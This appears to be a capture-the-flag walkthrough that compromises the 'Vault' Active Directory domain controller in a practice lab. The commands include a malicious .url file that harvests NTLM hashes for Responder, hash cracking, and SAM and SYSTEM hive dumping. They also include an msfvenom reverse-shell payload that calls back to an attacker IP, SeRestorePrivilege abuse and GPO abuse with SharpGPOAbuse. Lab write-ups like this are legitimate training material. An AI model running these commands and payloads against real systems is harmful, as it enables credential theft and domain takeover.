Vault

Initial Reconnaissance

We start with a basic scan to see which ports are open on the target (IP 192.168.240.172). For this, rustscan is a good quick-fire option:

rustscan -a 192.168.240.172

Scan output:

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 125
88/tcp    open  kerberos-sec     syn-ack ttl 125
135/tcp   open  msrpc            syn-ack ttl 125
139/tcp   open  netbios-ssn      syn-ack ttl 125
389/tcp   open  ldap             syn-ack ttl 125
445/tcp   open  microsoft-ds     syn-ack ttl 125
464/tcp   open  kpasswd5         syn-ack ttl 125
593/tcp   open  http-rpc-epmap   syn-ack ttl 125
636/tcp   open  ldapssl          syn-ack ttl 125
3268/tcp  open  globalcatLDAP    syn-ack ttl 125
3269/tcp  open  globalcatLDAPssl syn-ack ttl 125
3389/tcp  open  ms-wbt-server    syn-ack ttl 125
5985/tcp  open  wsman            syn-ack ttl 125
9389/tcp  open  adws             syn-ack ttl 125
49666/tcp open  unknown          syn-ack ttl 125
49668/tcp open  unknown          syn-ack ttl 125
49673/tcp open  unknown          syn-ack ttl 125
49674/tcp open  unknown          syn-ack ttl 125
49679/tcp open  unknown          syn-ack ttl 125
49703/tcp open  unknown          syn-ack ttl 125
49827/tcp open  unknown          syn-ack ttl 125

Loads of open ports show up, and many of them point to services you’d expect on a Windows domain controller like Kerberos, LDAP, SMB, and RPC. This suggests we're probably up against a Domain Controller.

To dig deeper, I ran an nmap scan with service detection and OS fingerprinting across all TCP ports:

sudo nmap -A -sC -sV -T4 192.168.240.172 -p- --open -v -oN tcp_scan.nmap

Scan results:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-23 23:02:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2025-04-23T23:03:05+00:00
|_ssl-date: 2025-04-23T23:03:45+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-22T22:58:29
| Not valid after:  2025-10-22T22:58:29
| MD5:   605f:ea38:3c3a:fcb6:e6bd:3808:4d72:8a53
|_SHA-1: dd3e:f566:e04d:1f7b:57b1:ccd1:ee78:93a4:015d:ebdc
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49827/tcp open  msrpc         Microsoft Windows RPC

From the output, we learn:

It's running Active Directory under the domain vault.offsec.
The host is named DC and provides plenty of Windows domain-related services.
Port 3389 (RDP) is open, as well as 5985 (WinRM), meaning we could try remote access later on.

To cover more ground, I scanned the top 1000 UDP ports too:

nmap -A -sV -sC -sU 192.168.240.172 --script=*enum -oN udp_scan.nmap

Next, I mapped the domain name to the IP in my /etc/hosts file to make future commands easier:

sudo nano /etc/hosts

192.168.240.172 vault.offsec DC.vault.offsec

Enumeration

DNS

Tried a zone transfer using dig, which can reveal internal hosts if DNS is misconfigured:

dig @192.168.240.172 axfr vault.offsec

┌──(kali㉿kali)-[~/Vault]
└─$ dig @192.168.240.172 axfr vault.offsec

; <<>> DiG 9.20.4-4-Debian <<>> @192.168.240.172 axfr vault.offsec
; (1 server found)
;; global options: +cmd
; Transfer failed.

No luck – the transfer failed (as expected in most hardened environments).

Kerberos

Used the krb5-enum-users NSE script in nmap to try enumerating valid usernames:

nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} 192.168.240.172

nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 192.168.240.172

┌──(kali㉿kali)-[~/Vault]
└─$ nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} 192.168.240.172  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 19:15 EDT
Nmap scan report for vault.offsec (192.168.240.172)
Host is up (0.12s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
|_krb5-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

┌──(kali㉿kali)-[~/Vault]
└─$ nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="vault.offsec",userdb='/home/kali/Desktop/wordlists/seclists/Usernames/Names/names.txt' 192.168.240.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 19:15 EDT
Nmap scan report for vault.offsec (192.168.240.172)
Host is up (0.12s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec

Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds

No valid users came back, but this method can be useful if a domain leaks usernames via Kerberos pre-auth.

We could try to get service tickets, but we get stopped by a password prompt.

impacket-GetUserSPNs -request -dc-ip 192.168.240.172 vault.offsec/svc_tgs

┌──(kali㉿kali)-[~/Vault]
└─$ impacket-GetUserSPNs -request -dc-ip 192.168.240.172 vault.offsec/svc_tgs 
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies 

Password:

LDAP

We might be able to query the LDAP service and pull some useful information. It’s a good idea to save the output to a file, since a successful result can generate a large amount of data. Having it stored makes it easier to search through later using the terminal or a text editor.

ldapsearch -H ldap://192.168.240.172 -x -b"DC=vault,DC=offsec" > ldap_dump.txt

┌──(kali㉿kali)-[~/Vault]
└─$ cat ldap_dump.txt 
# extended LDIF
#
# LDAPv3
# base <DC=vault,DC=offsec> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

RPC and SMB

Use rpcclient to attempt anonymous access to the Remote Procedure Call (RPC) service on the target machine.

rpcclient is a tool from the Samba suite used to interact with Windows RPC services.
U '' sets the username to blank, meaning you're trying to log in without a user account (i.e., anonymously).
N tells it not to prompt for a password (null session).
192.168.240.172 is the IP of the target (presumably a Domain Controller).

rpcclient -U '' -N 192.168.240.172

┌──(kali㉿kali)-[~/Vault]
└─$ rpcclient -U '' -N 192.168.240.172 
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

I tried connecting to SMB anonymously:

smbclient -L 192.168.240.172 -N

┌──(kali㉿kali)-[~/Vault]
└─$ smbclient -L 192.168.240.172 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DocumentsShare  Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.240.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We got a list of shares and the one called DocumentsShare stood out as it’s not a standard system share.

Attempted to access it:

smbclient //192.168.240.172/DocumentsShare

It appeared empty, but we had write access. We tested this by uploading a file:

echo 'this is a test' > test.txt

put test.txt

Capturing NTLM Hashes with Responder

We will use a tool called Responder to capture NTLM credentials by tricking the system into reaching out to our machine. To do this, we’ll create a specially crafted icon shortcut file that triggers a connection back to us.

Let’s start by creating that file. Copy the following content into a new file named Evil.url:

[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\<YOUR tun0 IP>\%USERNAME%.icon
IconIndex=1

For example:

┌──(kali㉿kali)-[~/Vault]
└─$ cat Evil.url 
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.230\%USERNAME%.icon
IconIndex=1

Start Responder on the attacking machine to listen for SMB authentication:

sudo responder -I tun0 -wv

Upload Evil.url to the SMB share.

smb: \> put Evil.url
putting file Evil.url as \Evil.url (0.3 kb/s) (average 0.2 kb/s)
smb: \> ls
  .                                   D        0  Wed Apr 23 19:34:46 2025
  ..                                  D        0  Wed Apr 23 19:34:46 2025
  Evil.url                            A      125  Wed Apr 23 19:34:46 2025
  test.txt                            A       15  Wed Apr 23 19:31:29 2025

                7706623 blocks of size 4096. 712123 blocks available

When a user opens that share in Explorer, their system tries to load the icon, leaking NTLM credentials. From Responder, we captured a hash for the user VAULT\anirudh.

[SMB] NTLMv2-SSP Client   : 192.168.240.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:8f0986f9b93c25a8:DD6B8898008205CAF1F53A11DEA431DA:0101000000000000806FD4B486B4DB0196F1F34D50DBB63E000000000200080046004E004700490001001E00570049004E002D004D005300370041005600350056004F00590035005A0004003400570049004E002D004D005300370041005600350056004F00590035005A002E0046004E00470049002E004C004F00430041004C000300140046004E00470049002E004C004F00430041004C000500140046004E00470049002E004C004F00430041004C0007000800806FD4B486B4DB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200330030000000000000000000

If you want to dive deeper into how this technique works, you can check out the full explanation at https://github.com/Greenwolf/ntlm_theft.

Cracking the Hash

Next, take the captured NTLMv2 hash from Responder and save it into a text file. This will allow us to try cracking it with a password list.

┌──(kali㉿kali)-[~/Vault]
└─$ cat hash.txt
anirudh::VAULT:8f0986f9b93c25a8:DD6B8898008205CAF1F53A11DEA431DA:0101000000000000806FD4B486B4DB0196F1F34D50DBB63E000000000200080046004E004700490001001E00570049004E002D004D005300370041005600350056004F00590035005A0004003400570049004E002D004D005300370041005600350056004F00590035005A002E0046004E00470049002E004C004F00430041004C000300140046004E00470049002E004C004F00430041004C000500140046004E00470049002E004C004F00430041004C0007000800806FD4B486B4DB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200330030000000000000000000

Use john to crack the hash:

john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hash.txt

┌──(kali㉿kali)-[~/Vault]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
SecureHM         (anirudh)     
1g 0:00:00:10 DONE (2025-04-23 19:39) 0.09775g/s 1037Kp/s 1037Kc/s 1037KC/s Seifer@14..Sda10184
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

We will add the credentials to our notes.

anirudh:SecureHM

Remote Access with RDP and WinRM

We have got a couple of options for remote access. We could try using WinRM, which is Windows Remote Management over port 5985, or see if the credentials work with Remote Desktop on port 3389.

Using the nxc, try RDP using the discovered credentials.

nxc rdp 192.168.240.172 -u anirudh -p SecureHM

┌──(kali㉿kali)-[~/Vault]
└─$ nxc rdp 192.168.240.172 -u anirudh -p SecureHM                               
RDP         192.168.240.172 3389   DC               [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC) (domain:vault.offsec) (nla:False)
RDP         192.168.240.172 3389   DC               [+] vault.offsec\anirudh:SecureHM

This worked and will likely give us GUI access.

xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:'anirudh' /p:'SecureHM' /v:vault.offsec

The command options are pretty straightforward — they tell the client to ignore certificate warnings, adjust the display size to match the window, and enable clipboard sharing.

It’s also a good idea to test this with rdesktop as well, since it can behave a bit differently.

rdesktop -u 'anirudh' -p 'SecureHM' -g 85% -D DC.vault.offsec

We’re seeing an error saying “The username and password is incorrect,” which means RDP access isn’t working. Since that’s a no-go, our next step is to try enumeration using tools like crackmapexec or nxc instead.

nxc winrm 192.168.240.172 -u anirudh -p SecureHM

┌──(kali㉿kali)-[~/Vault]
└─$ nxc winrm 192.168.240.172 -u anirudh -p SecureHM                             
WINRM       192.168.240.172 5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:vault.offsec)
WINRM       192.168.240.172 5985   DC               [+] vault.offsec\anirudh:SecureHM (Pwn3d!)

We’ve successfully connected to the machine via WinRM. The tool reports ‘Pwn3d’, which usually means we’ve got Administrator-level access, although CrackMapExec isn’t always accurate with that.

Now it’s time to take a closer look inside the system.

evil-winrm -i 192.168.240.172 -u anirudh -p SecureHM

┌──(kali㉿kali)-[~/Vault]
└─$ evil-winrm -i 192.168.240.172 -u anirudh -p SecureHM
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> ls
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh

User Flag

The user flag is located in the anirudh’s Desktop:

*Evil-WinRM* PS C:\Users\anirudh\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ls


    Directory: C:\Users\anirudh\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/23/2025   4:29 PM             34 local.txt


*Evil-WinRM* PS C:\Users\anirudh\Desktop> cat local.txt
d9baa4d1dafeec7bd27573cebb7dda9f
*Evil-WinRM* PS C:\Users\anirudh\Desktop> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : vault.offsec
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : vault.offsec

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-AB-6F-40
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.240.172(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.240.254
   DNS Servers . . . . . . . . . . . : 192.168.240.254
   NetBIOS over Tcpip. . . . . . . . : Enabled

Privilege Escalation

Option 1: Dump Local Hashes (Not Successful)

Check user privileges:

whoami /priv

*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

Even though this isn’t the Administrator account, we still have quite a bit of control. Privileges like SeBackupPrivilege, SeRestorePrivilege, and SeMachineAccountPrivilege are all promising avenues for escalation.

The SeBackupPrivilege stands out in particular. It lets us copy protected files like the SAM and SYSTEM hives, which store password hashes for local accounts. That’s a solid starting point.

Let’s give it a go by saving copies of those files to a directory we have access to.

reg save hklm\sam C:\users\anirudh\sam.hive

reg save hklm\system C:\users\anirudh\system.hive

Use Evil-WinRM’s built-in download command to retrieve the files. They’ll be saved to the same directory on your local machine where you originally launched the Evil-WinRM session.

download sam.hive
download system.hive

Once you've downloaded the files, you can analyse them using impacket-secretsdump to extract the password hashes.

impacket-secretsdump -system system.hive -sam sam.hive LOCAL

┌──(kali㉿kali)-[~/Vault]
└─$ impacket-secretsdump -system system.hive -sam sam.hive LOCAL
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

These hashes belong to local users, not domain accounts. Still, if we manage to access the system as the local Administrator, we’ll have everything we need regardless.

Let’s now check whether local administrators are allowed to connect via RDP and WinRM.

net localgroup 'Remote Desktop Users'

net localgroup 'Remote Management Users'

*Evil-WinRM* PS C:\Users\anirudh> net localgroup 'Remote Desktop Users'
Alias name     Remote Desktop Users
Comment        Members in this group are granted the right to logon remotely

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\Users\anirudh> net localgroup 'Remote Management Users'
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
anirudh
The command completed successfully.

It looks like only our current user has permission to access the system remotely.

We gave impacket-psexec a go using the Administrator’s hash, but it didn’t work:

┌──(kali㉿kali)-[~/Tools]
└─$ impacket-psexec -hashes 00000000000000000000000000000000:608339ddc8f434ac21945e026887dc36 administrator@192.168.240.172
Impacket v0.13.0.dev0+20250314.172046.8b4566b1 - Copyright Fortra, LLC and its affiliated companies 

[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.

Option 2: Scheduled Task Enumeration (Not Successful)

Let’s run winPEAS to see what useful information it can find. You’ll need to upload it using Evil-WinRM’s built-in upload command. Make sure the file is in the same directory where you started Evil-WinRM.

upload winpeas.exe

There are interesting findings:

ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft--
È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
    (ExplorerShellUnelevated) CreateExplorerShellUnelevatedTask: C:\Windows\Explorer.EXE /NOUACCHECK
    Trigger: When the task is created or modified

   =================================================================================================

    (VAULT\anirudh) Killexplorer: powershell.exe C:\Users\anirudh\KillExplorer.ps1
    Permissions file: anirudh [AllAccess]
    Permissions folder(DLL Hijacking): anirudh [AllAccess]
    Trigger: At 1:05 AM on 11/19/2021-After triggered, repeat every 00:05:00 indefinitely.

We don’t have direct access to view all the scheduled tasks, but there’s still a chance we can modify one. Let’s take a closer look at what’s available.

Get-ScheduledTask
schtasks

*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-ScheduledTask
Cannot connect to CIM server. Access denied 
At line:1 char:1
+ Get-ScheduledTask
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
    + FullyQualifiedErrorId : CimJob_BrokenCimSession,Get-ScheduledTask
*Evil-WinRM* PS C:\Users\anirudh\Documents> schtasks
Program 'schtasks.exe' failed to run: Access is deniedAt line:1 char:1
+ schtasks
+ ~~~~~~~~.
At line:1 char:1
+ schtasks
+ ~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

cd C:\windows\system32\tasks
ls

*Evil-WinRM* PS C:\windows\system32\tasks> ls


    Directory: C:\windows\system32\tasks


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:19 AM                Microsoft
-a----        1/18/2022  11:05 AM           3652 CreateExplorerShellUnelevatedTask
-a----       11/19/2021   1:12 AM           3450 Killexplorer
-a----       11/19/2021   1:05 AM           3576 ShareCheck
-a----       11/18/2021   8:25 PM           4178 User_Feed_Synchronization-{F800F482-DEE6-4DB5-AB71-CE8AABB98DF2}

We’ve come across the Killexplorer task again. The associated PowerShell script is sitting in our user’s home directory. Let’s take a look at what it does. Ideally, we’re after a scheduled task that runs with SYSTEM-level privileges.

type Killexplorer

*Evil-WinRM* PS C:\windows\system32\tasks> type Killexplorer
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2021-11-19T01:05:54</Date>
    <Author>VAULT\anirudh</Author>
    <URI>\Killexplorer</URI>
<SNIP>

This task runs under our current user account. Let’s also check what the script actually does.

type C:\Users\anirudh\KillExplorer.ps1

*Evil-WinRM* PS C:\Users\anirudh\Documents> type C:\Users\anirudh\KillExplorer.ps1
$shell=New-Object -ComObject Shell.Application
$window = $shell.Windows() | Where-Object { $_.LocationURL -like "$(([uri]"C:\DocumentsShare").AbsoluteUri)*" }
$window | ForEach-Object { $_.Quit() }

This suggests the scheduled task was originally designed to close a particular Explorer window, probably as part of an automated clean-up process.

Option 3: Abuse SeRestorePrivilege (Pwned)

Looking into ways we can escalate privileges using the rights we have led to a GitHub tool here:

https://github.com/dxnboy/redteam/blob/master/SeRestoreAbuse.exe

Next, we’ll create a malicious reverse shell payload using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=80 -f exe -o reverse.exe

┌──(kali㉿kali)-[~/Tools]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=80 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

Use Evil-WinRM’s upload command to transfer both SeRestoreAbuse.exe and reverse.exe to the target.

upload SeRestoreAbuse.exe
upload reverse.exe

*Evil-WinRM* PS C:\Users\anirudh\Documents> upload SeRestoreAbuse.exe
                                        
Info: Uploading /home/kali/Tools/SeRestoreAbuse.exe to C:\Users\anirudh\Documents\SeRestoreAbuse.exe
                                        
Data: 22528 bytes of 22528 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\anirudh\Documents> upload reverse.exe
                                        
Info: Uploading /home/kali/Tools/reverse.exe to C:\Users\anirudh\Documents\reverse.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!

Set up a listener on your machine to catch the reverse shell. It’s a good idea to use rlwrap so you retain arrow key functionality in the shell session.

sudo rlwrap nc -nvlp 80

Next, run SeRestoreAbuse.exe. It’s best practice to use the full absolute path when executing it to avoid any path-related issues.

.\SeRestoreAbuse.exe C:\Users\anirudh\Documents\reverse.exe

Now switch back to your listener and keep an eye out. If everything worked, you should see a connection coming through.

┌──(kali㉿kali)-[~]
└─$ sudo rlwrap nc -nvlp 80
[sudo] password for kali: 
listening on [any] 80 ...
connect to [192.168.45.230] from (UNKNOWN) [192.168.240.172] 49940
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Option 4: GPO Abuse (Pwned)

Go ahead and upload PowerView.ps1 using the upload command in Evil-WinRM.

upload PowerView.ps1

Run the PowerView script to load its functions, then use it to retrieve details about the Default Domain Policy. This will help us check if we can make changes to it.

.\powerview.ps1

Get-GPO -Name "Default Domain Policy"

*Evil-WinRM* PS C:\Users\anirudh\Documents> .\PowerView.ps1
*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPO -Name "Default Domain Policy"


DisplayName      : Default Domain Policy
DomainName       : vault.offsec
Owner            : VAULT\Domain Admins
Id               : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 11/19/2021 12:50:33 AM
ModificationTime : 11/19/2021 2:00:32 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 4, SysVol Version: 4
WmiFilter        :

Let’s check what level of access our user has on the Default Domain Policy by running:

Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh

*Evil-WinRM* PS C:\Users\anirudh\Documents> Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh
 


Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False

Looks like we’ve got full control over the GPO which means we can do just about anything!

We’re going to take advantage of this by adding our user to the local administrators group via the GPO, then force a policy update to apply the change.

To make this easier, download SharpGPOAbuse.exe from the following repo:

https://github.com/byronkg/SharpGPOAbuse

Once you’ve got it, upload the executable to your active Evil-WinRM session.

upload SharpGPOAbuse.exe

Next, run the tool with the following command to add our current user to the local administrators group via the Default Domain Policy:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

*Evil-WinRM* PS C:\Users\anirudh\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
[+] Domain = vault.offsec
[+] Domain Controller = DC.vault.offsec
[+] Distinguished Name = CN=Policies,CN=System,DC=vault,DC=offsec
[+] SID Value of anirudh = S-1-5-21-537427935-490066102-1511301751-1103
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\vault.offsec\SysVol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

Now let’s manually trigger a group policy update to apply the changes straight away:

gpupdate /force

*Evil-WinRM* PS C:\Users\anirudh\Documents> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.

Let’s confirm the change by checking the members of the local administrators group:

net localgroup administrators

*Evil-WinRM* PS C:\Users\anirudh\Documents> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
anirudh
The command completed successfully.

Root Flag

The root flag is located in the Administrator’s Desktop

C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C30-DCD7

 Directory of C:\Users\Administrator\Desktop

11/19/2021  02:10 AM    <DIR>          .
11/19/2021  02:10 AM    <DIR>          ..
04/23/2025  06:35 PM                34 proof.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,674,705,920 bytes free

C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
2ba03b9720ca9b9661ec8c92cc48ef49

C:\Users\Administrator\Desktop>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : DC
   Primary Dns Suffix  . . . . . . . : vault.offsec
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : vault.offsec

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-AB-7E-5A
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.240.172(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.240.254
   DNS Servers . . . . . . . . . . . : 192.168.240.254
   NetBIOS over Tcpip. . . . . . . . : Enabled

References

https://medium.com/@Dpsypher/proving-grounds-practice-vault-158516460860
https://www.youtube.com/watch?v=JocbrhLXuss